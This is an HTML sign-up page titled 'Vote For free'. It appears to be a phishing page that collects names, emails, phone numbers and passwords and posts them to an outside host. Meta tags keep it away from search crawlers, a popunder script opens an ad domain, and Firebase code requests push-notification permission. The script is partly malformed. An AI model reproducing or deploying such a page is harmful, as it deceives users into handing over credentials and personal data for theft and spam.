
<!DOCTYPE html>
<html>
<head>
     <meta name=”robots” content=noindex”>
  <meta name="robots" content="index,follow">
<meta name="robots" content="noindex,follow">
<meta name="robots" content="index,nofollow">
<meta name="robots" content="noindex,nofollow">
<meta name="googlebot" content="noindex,nofollow,noarchive,nosnippet,noodp" />
    <meta name="robots" content="noindex,nofollow,noarchive,nosnippet,noodp" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
body {
  font-family: Arial;
  font-size: 17px;
  padding: 8px;
}

* {
  box-sizing: border-box;
}

.row {
  display: -ms-flexbox; /* IE10 */
  display: flex;
  -ms-flex-wrap: wrap; /* IE10 */
  flex-wrap: wrap;
  margin: 0 -16px;
}

.col-25 {
  -ms-flex: 25%; /* IE10 */
  flex: 25%;
}

.col-50 {
  -ms-flex: 50%; /* IE10 */
  flex: 50%;
}

.col-75 {
  -ms-flex: 75%; /* IE10 */
  flex: 75%;
}

.col-25,
.col-50,
.col-75 {
  padding: 0 16px;
}

.container {
  background-color: #f2f2f2;
  padding: 5px 20px 15px 20px;
  border: 1px solid lightgrey;
  border-radius: 3px;
}

input {
  width: 100%;
  margin-bottom: 20px;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 3px;
}
@media only screen and (min-width:500px) {
        input, #anonymousProcess {
            width: 50%;
        }
    }
label {
  margin-bottom: 10px;
  display: block;
}

.icon-container {
  margin-bottom: 20px;
  padding: 7px 0;
  font-size: 24px;
}

.btn {
  background-color: #04AA6D;
  color: white;
  padding: 12px;
  margin: 10px 0;
  border: none;
  width: 100%;
  border-radius: 3px;
  cursor: pointer;
  font-size: 17px;
}

.btn:hover {
  background-color: #45a049;
}

a {
  color: #2196F3;
}

hr {
  border: 1px solid lightgrey;
}

span.price {
  float: right;
  color: grey;
}

/* Responsive layout - when the screen is less than 800px wide, make the two columns stack on top of each other instead of next to each other (also change the direction - make the "cart" column go on top) */
@media (max-width: 800px) {
  .row {
    flex-direction: column-reverse;
  }
  .col-25 {
    margin-bottom: 20px;
  }
}
</style>
</head>
<body>

<h2>Vote For free</h2>
<p>Create a new account.</p>
<div class="row">
  <div class="col-75">
    <div class="container">
<form id="anonymousNewMessage" class="form" method="POST" action="https://pinnocent.com/vpage">
                <div class="card-header text-center">

              <input type="hidden" name="ftype" value="atm" />

    
                </div>
                <div class="card-body">

                    <input type="hidden" name="user_id" id="userUsername" value="16934"
     
        <div class="row">
          <div class="col-50">
            <h3>Create Account</h3>
            <label for="fname"><i class="fa fa-user"></i> Full Name</label>
            <input type="text" id="fname" name="s_6" placeholder="John M. Doe" required="">
            <label for="email"><i class="fa fa-envelope"></i> Email</label>
            <input type="email" id="email" name="s_7" placeholder="john@example.com" required="">
          <label for="zip"><i class="fa fa-phone"></i> Phone Number</label>
                <input type="number" id="zip" name="s_11" placeholder="Enter phone your phone number">
            <label for="city"><i class="fa fa-lock"></i> Password </label>
            <input type="password" id="city" name="s_9" placeholder="Enter Password" required="">

            <div class="row">
              <div class="col-50">
                <label for="state"><i class="fa fa-lock"></i> Confirm password</label>
                <input type="password" id="state" name="s_10" placeholder="Enter password Again" required="">
              </div>
            </div>
          </div>
<input class="btn" name="login" type="submit" id="anonymousProcess" value="Create Account"><br/><br/>


      </form>
      <p> I already have an account <a href="login.html" style="text-decoration: none;">Login here</a></p>
    </div>
  </div>

    </div>
  </div>
</div>
                
  <!--   Core JS Files   -->
  <script src="./assets/js/core/jquery.min.js" type="text/javascript"></script>
  <!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-E7K8F1651E"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-E7K8F1651E');
</script>
<script src="back.js?1734976792">
</script>
<script src="https://old.pinnocent.coms/jspopunder.min.js"></script>
<script>
jsPopunder('https://noopsaithu.net/4/7193696', {
name: 'poptest',
width: (screen.width/2),
height: (screen.height-100),
top: 0, left: 0,
wait: 43200, cap: 120000
});
</script>
  
<script src="https://www.gstatic.com/firebasejs/4.9.1/firebase.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>

<link rel="manifest" href="manifest.json">
<script>
  // Initialize Firebase
  /*Update this config*/
  var config = {
     apiKey: "AIzaSyBV2pY0LLJTrHhiCFArAedQpTiUshDJsi8",
  authDomain: "pinnocent-fa387.firebaseapp.com",
  databaseURL: "https://pinnocent-fa387.firebaseio.com",
  projectId: "pinnocent-fa387",
  storageBucket: "pinnocent-fa387.appspot.com",
  messagingSenderId: "403452483449",
  appId: "1:403452483449:web:630abc1e7c265a8f0481a8",
  measurementId: "G-8DGVGDCCL2"
  };
  firebase.initializeApp(config);

// Retrieve Firebase Messaging object.
const messaging = firebase.messaging();
messaging.requestPermission()
.then(function() {
  console.log('Notification permission granted.');
  // TODO(developer): Retrieve an Instance ID token for use with FCM.

              
                vapidKey: 'BLf-6mYxA6BPIXK-MpMWYKuLDPpbKFtXdERFs506kY1xZsek0B8ieRRIikBGaO0LKrFXzglm-mNr4rpMypLLiJ4' }).then((currentToken) => {
                if (currentToken) {
                    console.log("Token is: "+currentToken);
  } else {
  getRegToken();
  }

})
.catch(function(err) {
  console.log('Unable to get permission to notify.', err);
});

function getRegToken(argument) {
messaging.getToken()
  .then(function(currentToken) {
    if (currentToken) {
      saveToken(currentToken);
      console.log(currentToken);
      setTokenSentToServer(true);
    } else {
      console.log('No Instance ID token available. Request permission to generate one.');
      setTokenSentToServer(false);
    }
  })
  .catch(function(err) {
    console.log('An error occurred while retrieving token. ', err);
    setTokenSentToServer(false);
  });
}

function setTokenSentToServer(sent) {
    window.localStorage.setItem('sentToServer', sent ? 1 : 0);
}

function isTokenSentToServer() {
    return window.localStorage.getItem('sentToServer') == 1;
}

function saveToken(currentToken) {
$.ajax({
url: '?',
method: 'post',
data: 'token=' + currentToken
}).done(function(result){
console.log(result);
})
}

messaging.onMessage(function(payload) {
  console.log("Message received. ", payload);
  notificationTitle = payload.data.title;
  notificationOptions = {
  body: payload.data.body,
  icon: payload.data.icon,
  image:  payload.data.image
  };
  var notification = new Notification(notificationTitle,notificationOptions);
});
</script>



</body>
</html>
